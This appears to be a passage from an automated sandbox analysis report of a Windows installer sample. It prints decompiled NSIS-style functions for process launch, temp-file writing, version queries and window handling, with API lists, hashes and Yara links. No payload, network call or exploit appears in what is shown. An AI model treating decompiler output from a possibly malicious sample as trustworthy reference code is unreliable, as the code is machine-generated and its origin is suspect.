                                                                                                                              0x00401bc2
                                                                                                                              0x00401bc5
                                                                                                                              0x00401bce
                                                                                                                              0x00401bce
                                                                                                                              0x00401bd1
                                                                                                                              0x00401bd5
                                                                                                                              0x00401bde
                                                                                                                              0x00401bde
                                                                                                                              0x00401be1
                                                                                                                              0x00401be5
                                                                                                                              0x00401be7
                                                                                                                              0x00401c34
                                                                                                                              0x00401c36
                                                                                                                              0x00401c3f
                                                                                                                              0x00401c47
                                                                                                                              0x00401c4a
                                                                                                                              0x00401c4a
                                                                                                                              0x00401c53
                                                                                                                              0x00000000
                                                                                                                              0x00401be9
                                                                                                                              0x00401bf0
                                                                                                                              0x00401bf2
                                                                                                                              0x00401bfa
                                                                                                                              0x00401bfd
                                                                                                                              0x00401c25
                                                                                                                              0x00401c59
                                                                                                                              0x00401c59
                                                                                                                              0x00401bff
                                                                                                                              0x00401c0d
                                                                                                                              0x00401c15
                                                                                                                              0x00401c18
                                                                                                                              0x00401c18
                                                                                                                              0x00401bfd
                                                                                                                              0x00401c5c
                                                                                                                              0x00401c5f
                                                                                                                              0x00401c65
                                                                                                                              0x00402833
                                                                                                                              0x00402833
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                              • String ID: !
                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                              • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                                              • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                                                              • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                                              • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                              0x004053cf
                                                                                                                              0x004053eb
                                                                                                                              0x004053f3
                                                                                                                              0x004053f8
                                                                                                                              0x00000000
                                                                                                                              0x004053fe
                                                                                                                              0x00405402

                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                                                              Strings
                                                                                                                              • Error launching installer, xrefs: 004053D9
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                                              • API String ID: 3712363035-2984075973
                                                                                                                              • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                                              • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                                                              • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                                              • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405659(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                                              0x0040565a
                                                                                                                              0x00405671
                                                                                                                              0x00405679
                                                                                                                              0x00405679
                                                                                                                              0x00405681

                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                                                              • lstrcatA.KERNEL32(?,00409010), ref: 00405679
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 2659869361-3916508600
                                                                                                                              • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                              • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                                                              • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                              • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                                                              0x00401ec7
                                                                                                                              0x00401ecf
                                                                                                                              0x00401ed4
                                                                                                                              0x00401ed9
                                                                                                                              0x00401edd
                                                                                                                              0x00401ee0
                                                                                                                              0x00401ee2
                                                                                                                              0x00401ee9
                                                                                                                              0x00401ef2
                                                                                                                              0x00401efa
                                                                                                                              0x00401efd
                                                                                                                              0x00401f12
                                                                                                                              0x00401f18
                                                                                                                              0x00401f2b
                                                                                                                              0x00401f34
                                                                                                                              0x00401f40
                                                                                                                              0x00401f45
                                                                                                                              0x00401f45
                                                                                                                              0x00401f2b
                                                                                                                              0x00401f48
                                                                                                                              0x00401b75
                                                                                                                              0x00401b75
                                                                                                                              0x00401efd
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                                              • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                                                • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1404258612-0
                                                                                                                              • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                                              • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                                                              • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                                              • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                                              0x00401d29
                                                                                                                              0x00401d42
                                                                                                                              0x00401d4c
                                                                                                                              0x00401d51
                                                                                                                              0x00401d5c
                                                                                                                              0x00401d63
                                                                                                                              0x00401d75
                                                                                                                              0x00401d7b
                                                                                                                              0x00401d80
                                                                                                                              0x00401d8a
                                                                                                                              0x004024b8
                                                                                                                              0x00401561
                                                                                                                              0x00402833
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(?), ref: 00401D22
                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                              • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsCreateDeviceFontIndirect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3272661963-0
                                                                                                                              • Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                                              • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                                                              • Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                                              • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                                                              0x00404e60
                                                                                                                              0x00404e85
                                                                                                                              0x00404ea5
                                                                                                                              0x00404ea8
                                                                                                                              0x00404eab
                                                                                                                              0x00404ec2
                                                                                                                              0x00404ec8
                                                                                                                              0x00404ecf
                                                                                                                              0x00404ed6
                                                                                                                              0x00404edd
                                                                                                                              0x00404ee2
                                                                                                                              0x00404ee8
                                                                                                                              0x00000000
                                                                                                                              0x00404ef8
                                                                                                                              0x00404e92
                                                                                                                              0x00404ee5
                                                                                                                              0x00404ee5
                                                                                                                              0x00000000
                                                                                                                              0x00404ee5
                                                                                                                              0x00404e9e
                                                                                                                              0x00404ea0
                                                                                                                              0x00000000
                                                                                                                              0x00404ea0
                                                                                                                              0x00404e66
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404e6d
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                                                              • CallWindowProcA.USER32 ref: 00404EF8
                                                                                                                                • Part of subcall function 00403F64: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403F76
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                              • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                                              • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                                                              • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                                              • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nscEE2E.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                                              0x004024be
                                                                                                                              0x004024be
                                                                                                                              0x004024c1
                                                                                                                              0x004024dc
                                                                                                                              0x004024c3
                                                                                                                              0x004024c5
                                                                                                                              0x004024ca
                                                                                                                              0x004024d1
                                                                                                                              0x004024e3
                                                                                                                              0x0040265c
                                                                                                                              0x0040265c
                                                                                                                              0x004024e9
                                                                                                                              0x004024fb
                                                                                                                              0x004015a6
                                                                                                                              0x004015a8
                                                                                                                              0x00000000
                                                                                                                              0x004015ae
                                                                                                                              0x004015a8
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nscEE2E.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\nscEE2E.tmp\System.dll, xrefs: 004024CA, 004024EF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWritelstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nscEE2E.tmp\System.dll
                                                                                                                              • API String ID: 427699356-234301717
                                                                                                                              • Opcode ID: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                                                              • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                                                              • Opcode Fuzzy Hash: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                                                              • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404FD6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 44%
                                                                                                                              			E00404FD6(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x423ec8; // 0x55ef7c
				_t10 =  *0x423ecc; // 0x3
				__imp__OleInitialize(0);
				 *0x423f58 =  *0x423f58 | __eax;
				E00403F64(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					do {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) == 0) {
							goto L4;
						} else {
							_push(_v0);
							if(E00401389( *_t12) != 0) {
								 *0x423f2c =  *0x423f2c + 1;
							} else {
								goto L4;
							}
						}
						goto L7;
						L4:
						_t12 = _t12 + 0x418;
					} while (_t10 != 0);
				}
				L7:
				E00403F64(0x404);
				__imp__OleUninitialize();
				_t8 =  *0x423f2c; // 0x0
				return _t8;
			}








                                                                                                                              0x00404fd7
                                                                                                                              0x00404fde
                                                                                                                              0x00404fe6
                                                                                                                              0x00404fec
                                                                                                                              0x00404ff4
                                                                                                                              0x00404ffb
                                                                                                                              0x00404ffd
                                                                                                                              0x00405000
                                                                                                                              0x00405000
                                                                                                                              0x00405005
                                                                                                                              0x00000000
                                                                                                                              0x00405007
                                                                                                                              0x00405007
                                                                                                                              0x00405014
                                                                                                                              0x00405022
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405014
                                                                                                                              0x00000000
                                                                                                                              0x00405016
                                                                                                                              0x00405016
                                                                                                                              0x0040501c
                                                                                                                              0x00405020
                                                                                                                              0x00405028
                                                                                                                              0x0040502d
                                                                                                                              0x00405032
                                                                                                                              0x00405038
                                                                                                                              0x0040503f

                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00404FE6
                                                                                                                                • Part of subcall function 00403F64: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403F76
                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 00405032
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
